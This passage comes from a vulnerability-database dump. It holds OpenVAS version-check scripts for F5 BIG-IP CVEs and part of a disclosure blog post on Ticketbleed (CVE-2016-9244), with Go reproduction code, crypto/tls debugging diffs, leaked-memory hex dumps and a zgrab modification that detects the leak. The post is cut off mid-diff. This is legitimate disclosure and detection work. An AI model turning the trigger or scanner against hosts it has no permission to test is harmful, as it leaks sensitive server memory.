'12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-07T18:32:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9256", "CVE-2016-9244"], "description": "Permissions enforced by iControl can lag behind the actual permissions assigned to a user if the role_map is not reloaded between the time the permissions are changed and the time of the user", "modified": "2020-04-03T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140194", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140194", "type": "openvas", "title": "F5 BIG-IP - iControl vulnerability CVE-2016-9256", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - iControl vulnerability CVE-2016-9256\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140194\");\n script_cve_id(\"CVE-2016-9256\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - iControl vulnerability CVE-2016-9256\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K47284724\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Permissions enforced by iControl can lag behind the actual permissions assigned to a user if the role_map is not reloaded between the time the permissions are changed and the time of the user's next request. This is a race condition that occurs rarely in normal usage. The typical period in which this is possible is limited to at most a few seconds after the permission change.\");\n\n script_tag(name:\"impact\", value:\"When an iControl user has administrative\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 10:25:58 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;11.2.1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.4.0-11.6.1;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-04-07T18:32:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7124", "CVE-2016-9244"], "description": "ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.", "modified": "2020-04-03T00:00:00", "published": "2017-03-07T00:00:00", "id": "OPENVAS:1361412562310140178", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140178", "type": "openvas", "title": "F5 BIG-IP - PHP vulnerability CVE-2016-7124", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - PHP vulnerability CVE-2016-7124\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140178\");\n script_cve_id(\"CVE-2016-7124\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - PHP vulnerability CVE-2016-7124\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K54308010\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may be able to cause a denial of service (DoS) or other unspecified impact by way of\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 10:25:29 +0100 (Tue, 07 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-07T18:32:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7474", "CVE-2016-9244"], "description": "In some cases the MCPD binary cache may allow a user with Advanced Shell access, or privileges to generate a qkview, to temporarily obtain normally unrecoverable information.", "modified": "2020-04-03T00:00:00", "published": "2017-03-27T00:00:00", "id": "OPENVAS:1361412562310140221", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140221", "type": "openvas", "title": "F5 BIG-IP - Article: K52180214 - MCPD vulnerability CVE-2016-7474", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - MCPD vulnerability CVE-2016-7474\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140221\");\n script_cve_id(\"CVE-2016-7474\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - Article: K52180214 - MCPD vulnerability CVE-2016-7474\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K52180214\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"In some cases the MCPD binary cache may allow a user with Advanced Shell access, or privileges to generate a qkview, to temporarily obtain normally unrecoverable information.\");\n\n script_tag(name:\"impact\", value:\"A local user may have access to sensitive data such as passwords for recently created local user accounts and passphrases that have been set since the last reboot.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-27 12:41:02 +0200 (Mon, 27 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.4.0-11.6.1;11.2.1;',\n 'unaffected', '11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2;12.1.1_HF1;11.6.1_HF1;11.5.4_HF4;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "filippoio": [{"lastseen": "2017-06-30T16:13:04", "bulletinFamily": "blog", "cvelist": ["CVE-2016-9244"], "description": "Ticketbleed (CVE-2016-9244) is a software vulnerability in the TLS stack of certain F5 products that allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time, which can contain any kind of random sensitive information, like in Heartbleed.\n\nIf you suspect you might be affected by this vulnerability, you can find details and mitigation instructions at [ticketbleed.com](<https://ticketbleed.com>) (including an online test) or in the [F5 K05121675 article](<https://support.f5.com/csp/article/K05121675>).\n\n\n\nIn this post we'll talk about how Ticketbleed was found, verified and reported.\n\n## JIRA RG-XXX\n\nIt all started with a bug report from a customer using Cloudflare [Railgun](<https://www.cloudflare.com/website-optimization/railgun/>).\n\n> **rg-listener <> origin requests fail with \"local error: unexpected message\"**\n> \n> A PCAP of the rg-listener <> origin traffic is attached and shows a TLS alert being triggered during the handshake.\n> \n> Worth noting the customer is using an F5 Load Balancer in front of the Railgun and the Origin Web Server: `visitor > edge > cache > rg-sender > F5 > rg-listener > F5 > origin web server`\n> \n> Matthew was unable to replicate by using a basic TLS.Dial in Go so this seems tricky so far.\n\nA bit of context on Railgun: Railgun speeds up requests between the Cloudflare edge and the origin web site by establishing a permanent optimized connection and performing delta compression on HTTP responses.\n\n\n\nThe Railgun connection uses a custom binary protocol over TLS, and the two endpoints are Go programs: one on the Cloudflare edge and one installed on the customer servers. This means that the whole connection goes through the Go TLS stack, crypto/tls.\n\nThat connection failing with `local error: unexpected message` means that the customer\u2019s side of the connection sent something that confused the Go TLS stack of the Railgun running on our side. Since the customer is running an F5 load balancer between their Railgun and ours, this points towards an **incompatibility between the Go TLS stack and the F5 one**.\n\nHowever, when my colleague Matthew tried to reproduce the issue by connecting to the load balancer with a simple Go `crypto/tls.Dial`, it succeeded.\n\n## PCAP diving\n\nSince Matthew sits at a desk opposite of mine in the Cloudflare London office, he knew I've been working with the Go TLS stack for our TLS 1.3 implementation. We quickly ended up in a joint debugging session.\n\nHere's the PCAP we were staring at.\n\n\n\nSo, there's the ClientHello, right. The ServerHello, so far so good. And then immediately a ChangeCipherSpec. Oh. Ok.\n\nA ChangeCipherSpec is how TLS 1.2 says \"let's switch to encrypted\". The only way a ChangeCipherSpec can come this early in a 1.2 handshake, is if session resumption happened.\n\nAnd indeed, by focusing on the ClientHello we can see that the Railgun client sent a Session Ticket.\n\n\n\nA Session Ticket carries some encrypted key material from a previous session to allow the server to resume that previous session immediately instead of negotiating a new one.\n\n\n\n_To learn more about session resumption in TLS 1.2, watch the first part of [the Cloudflare Crypto Team TLS 1.3 talk](<https://blog.cloudflare.com/tls-1-3-explained-by-the-cloudflare-crypto-team-at-33c3/>), [read the transcript](<https://blog.cloudflare.com/tls-1-3-overview-and-q-and-a/>), or the [\"TLS Session Resumption\" post](<https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/>) on the Cloudflare blog._\n\nAfter that ChangeCipherSpec both Railgun and Wireshark get pretty confused (HelloVerifyRequest? Umh?). So we have reason to believe the issue is related to Session Tickets.\n\nIn Go you have to explicitly enable Session Tickets on the client side by setting a `ClientSessionCache`. We verified that indeed Railgun uses this functionality and wrote this small test:\n \n \n package main\n \n import ( \n \"crypto/tls\"\n )\n \n func main() { \n conf := &tls.Config{\n InsecureSkipVerify: true,\n ClientSessionCache: tls.NewLRUClientSessionCache(32),\n }\n \n conn, err := tls.Dial(\"tcp\", \"redacted:443\", conf)\n if err != nil {\n panic(\"failed to connect: \" + err.Error())\n }\n conn.Close()\n \n conn, err = tls.Dial(\"tcp\", \"redacted:443\", conf)\n if err != nil {\n panic(\"failed to resume: \" + err.Error())\n }\n conn.Close()\n }\n \n\nAnd sure enough, `local error: unexpected message`.\n\n## crypto/tls diving\n\nOnce I had it reproduced in a local `crypto/tls` it became a home game. `crypto/tls` error messages tend to be short of details, but a quick tweak allows us to pinpoint where they are generated.\n\nEvery time a fatal error occurs, `setErrorLocked` is called to record the error and make sure that all following operations fail. That function is usually called from the site of the error.\n\nA well placed `panic(err)` will drop a stack trace that should show us _what_ message is unexpected.\n \n \n diff --git a/src/crypto/tls/conn.go b/src/crypto/tls/conn.go \n index 77fd6d3254..017350976a 100644 \n --- a/src/crypto/tls/conn.go\n +++ b/src/crypto/tls/conn.go\n @@ -150,8 +150,7 @@ type halfConn struct {\n }\n \n func (hc *halfConn) setErrorLocked(err error) error {\n - hc.err = err\n - return err\n + panic(err)\n }\n \n // prepareCipherSpec sets the encryption and MAC states\n \n \n \n panic: local error: tls: unexpected message\n \n goroutine 1 [running]: \n panic(0x185340, 0xc42006fae0) \n /Users/filippo/code/go/src/runtime/panic.go:500 +0x1a1\n crypto/tls.(*halfConn).setErrorLocked(0xc42007da38, 0x25e6e0, 0xc42006fae0, 0x25eee0, 0xc4200c0af0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:153 +0x4d\n crypto/tls.(*Conn).sendAlertLocked(0xc42007d880, 0x1c390a, 0xc42007da38, 0x2d) \n /Users/filippo/code/go/src/crypto/tls/conn.go:719 +0x147\n crypto/tls.(*Conn).sendAlert(0xc42007d880, 0xc42007990a, 0x0, 0x0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:727 +0x8c\n crypto/tls.(*Conn).readRecord(0xc42007d880, 0xc400000016, 0x0, 0x0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:672 +0x719\n crypto/tls.(*Conn).readHandshake(0xc42007d880, 0xe7a37, 0xc42006c3f0, 0x1030e, 0x0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:928 +0x8f\n crypto/tls.(*clientHandshakeState).doFullHandshake(0xc4200b7c10, 0xc420070480, 0x55) \n /Users/filippo/code/go/src/crypto/tls/handshake_client.go:262 +0x8c\n crypto/tls.(*Conn).clientHandshake(0xc42007d880, 0x1c3928, 0xc42007d988) \n /Users/filippo/code/go/src/crypto/tls/handshake_client.go:228 +0xfd1\n crypto/tls.(*Conn).Handshake(0xc42007d880, 0x0, 0x0) \n /Users/filippo/code/go/src/crypto/tls/conn.go:1259 +0x1b8\n crypto/tls.DialWithDialer(0xc4200b7e40, 0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0x4ff80, 0xc420072000, 0xc42007d118) \n /Users/filippo/code/go/src/crypto/tls/tls.go:146 +0x1f8\n crypto/tls.Dial(0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0xc42007ce00, 0x0, 0x0) \n /Users/filippo/code/go/src/crypto/tls/tls.go:170 +0x9d\n \n\nSweet, let's see where the unexpected message alert is sent, at `conn.go:672`.\n \n \n 670 case recordTypeChangeCipherSpec:\n 671 if typ != want || len(data) != 1 || data[0] != 1 {\n 672 c.in.setErrorLocked(c.sendAlert(alertUnexpectedMessage))\n 673 break\n 674 }\n 675 err := c.in.changeCipherSpec()\n 676 if err != nil {\n 677 c.in.setErrorLocked(c.sendAlert(err.(alert)))\n 678 }\n \n\nSo the message we didn't expect is the ChangeCipherSpec. Let's see if the higher stack frames give us an indication as to what we expected instead. Let's chase `handshake_client.go:262`.\n \n \n 259 func (hs *clientHandshakeState) doFullHandshake() error {\n 260 c := hs.c\n 261\n 262 msg, err := c.readHandshake()\n 263 if err != nil {\n 264 return err\n 265 }\n \n\nAh, `doFullHandshake`. Wait. The server here is clearly doing a resumption (sending a Change Cipher Spec immediately after the Server Hello), while the client... tries to do a full handshake?\n\nIt looks like the client offers a Session Ticket, the server _accepts it_, but the client _doesn't realize and carries on_.\n\n## RFC diving\n\nAt this point I had to fill a gap in my TLS 1.2 knowledge. How does a server signal acceptance of a Session Ticket?\n\n[RFC 5077](<https://tools.ietf.org/html/rfc5077>), which obsoletes RFC 4507, says:\n\n> When presenting a ticket, the client MAY generate and include a Session ID in the TLS ClientHello. If the server accepts the ticket and the Session ID is not empty, then it MUST respond with the same Session ID present in the ClientHello.\n\nSo a client that doesn't want to guess whether a Session Ticket is accepted or not will send a Session ID and look for it to be echoed back by the server.\n\nThe code in `crypto/tls`, clear as always, does exactly that.\n \n \n func (hs *clientHandshakeState) serverResumedSession() bool { \n // If the server responded with the same sessionId then it means the\n // sessionTicket is being used to resume a TLS session.\n return hs.session != nil && hs.hello.sessionId != nil &&\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\n }\n \n\n## Session IDs diving\n\nSomething must be going wrong there. Let's practice some healthy print-based debugging.\n \n \n diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go \n index f789e6f888..2868802d82 100644 \n --- a/src/crypto/tls/handshake_client.go\n +++ b/src/crypto/tls/handshake_client.go\n @@ -552,6 +552,8 @@ func (hs *clientHandshakeState) establishKeys() error {\n func (hs *clientHandshakeState) serverResumedSession() bool {\n // If the server responded with the same sessionId then it means the\n // sessionTicket is being used to resume a TLS session.\n + println(hex.Dump(hs.hello.sessionId))\n + println(hex.Dump(hs.serverHello.sessionId))\n return hs.session != nil && hs.hello.sessionId != nil &&\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\n }\n \n \n \n 00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.|\n \n 00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.| \n 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n \n\nAh. The F5 server is padding the Session ID to its maximum length of 32 bytes, instead of returning it as the client sent it. crypto/tls in Go uses 16 byte Session IDs.\n\nFrom there the failure mode is clear: the server thinks it told the client to use the ticket, the client thinks the server started a new session, and things get unexpected.\n\nIn the TLS space we have seen quite some incompatibilities like this. Notoriously, ClientHellos have to be either shorter than 256 bytes or longer than 512 [not to clash with some server implementations](<https://bugs.chromium.org/p/chromium/issues/detail?id=315828>).\n\nI was about to write this up as just another real world TLS quirk when...\n \n \n 00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%|\n \n 00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%| \n 00000010 04 27 a8 4f 63 22 de 8b ef f9 a3 13 dd 66 5c ee |.'.Oc\".......f\\.| \n \n\nUh oh. Wait. Those are not zeroes. That's not padding. That's... memory?\n\nAt this point the impression of dealing with a Heartbleed-like vulnerability got pretty clear. The server is allocating a buffer as big as the client's Session ID, and then sending back always 32 bytes, bringing along whatever unallocated memory was in the extra bytes.\n\n## Browser diving\n\nI had one last source of skepticism: how could this not have been noticed before?\n\nThe answer is banal: all browsers use 32-byte Session IDs to negotiate Session Tickets. Together with Nick Sullivan I checked NSS, OpenSSL and BoringSSL to confirm. [Here's BoringSSL for example](<https://github.com/google/boringssl/blob/33fe4a0d1406f423e7424ea7367e1d1a51c2edc1/ssl/handshake_client.c#L1901-L1908>).\n \n \n /* Generate a session ID for this session based on the session ticket. We use\n * the session ID mechanism for detecting ticket resumption. This also fits in\n * with assumptions elsewhere in OpenSSL.*/\n if (!EVP_Digest(CBS_data(&ticket), CBS_len(&ticket),\n session->session_id, &session->session_id_length,\n EVP_sha256(), NULL)) {\n goto err;\n }\n \n\nBoringSSL uses a SHA256 hash of the Session Ticket, which is exactly 32 bytes.\n\n(Interestingly, from speaking to people in the TLS field, there was an idle intention to switch to 1-byte Session IDs but no one had tested it widely yet.)\n\nAs for Go, it\u2019s probably the case that client-side Session Tickets are not enabled that often.\n\n## Disclosure diving\n\nAfter realizing the security implications of this issue we compartmentalized it inside the company, made sure our Support team would advise our customer to simply disable Session Tickets, and sought to contact F5.\n\nAfter a couple misdirected emails that were met by requests for Serial Numbers, we got in contact with the F5 SIRT, exchanged PGP keys, and provided a report and a PoC.\n\nThe report was escalated to the development team, and confirmed to be an uninitialized memory disclosure limited to the Session Ticket functionality.\n\nIt's unclear what data might be exfiltrated via this vulnerability, but Heartbleed and the [Cloudflare Heartbleed Challenge](<https://blog.cloudflare.com/the-results-of-the-cloudflare-challenge/>) taught us not to make assumptions of safety with uninitialized memory.\n\nIn planning a timeline, the F5 team was faced with a rigid release schedule. Considering multiple factors, including the availability of an effective mitigation (disabling Session Tickets) and the apparent triviality of the vulnerability, I decided to adhere to the [industry-standard disclosure policy adopted by Google's Project Zero](<https://googleprojectzero.blogspot.co.uk/2015/02/feedback-and-data-driven-updates-to.html>): 90 days with 15 days of grace period if a fix is due to be released.\n\nBy coincidence today coincides with both the expiration of those terms and the scheduled release of the first hotfix for one of the affected versions.\n\nI'd like to thank the F5 SIRT for their professionalism, transparency and collaboration, which were in pleasant contrast with the stories of adversarial behavior we hear too often in the industry.\n\nThe issue was assigned CVE-2016-9244.\n\n## Internet diving\n\nWhen we reported the issue to F5 I had tested the vulnerability against a single host, which quickly became unavailable after disabling Session Tickets. That meant having both low confidence in the extent of the vulnerability, and no way to reproduce it.\n\nThis was the perfect occasion to perform an Internet scan. I picked the toolkit that powers Censys.io by the University of Michigan: zmap and zgrab.\n\nzmap is an IPv4-space scanning tool that detects open ports, while zgrab is a Go tool that follows up by connecting to those ports and collecting a number of protocol details.\n\nI added support for Session Ticket resumption to zgrab, and then wrote a simple Ticketbleed detector by having zgrab send a 31-byte Session ID, and comparing it with the one returned by the server.\n \n \n diff --git a/ztools/ztls/handshake_client.go b/ztools/ztls/handshake_client.go \n index e6c506b..af098d3 100644 \n --- a/ztools/ztls/handshake_client.go\n +++ b/ztools/ztls/handshake_client.go\n @@ -161,7 +161,7 @@ func (c *Conn) clientHandshake() error {\n session, sessionCache = nil, nil\n hello.ticketSupported = true\n hello.sessionTicket = []byte(c.config.FixedSessionTicket)\n - hello.sessionId = make([]byte, 32)\n + hello.sessionId = make([]byte, 32-1)\n if _, err := io.ReadFull(c.config.rand(), hello.sessionId); err != nil {\n c.sendAlert(alertInternalError)\n return errors.New(\"tls: short read from Rand: \" + err.Error())\n @@ -658,8 +658,11 @@ func (hs *clientHandshakeState) processServerHello() (bool, error) {\n \n if c.config.FixedSessionTicket != nil {\n c.resumption = 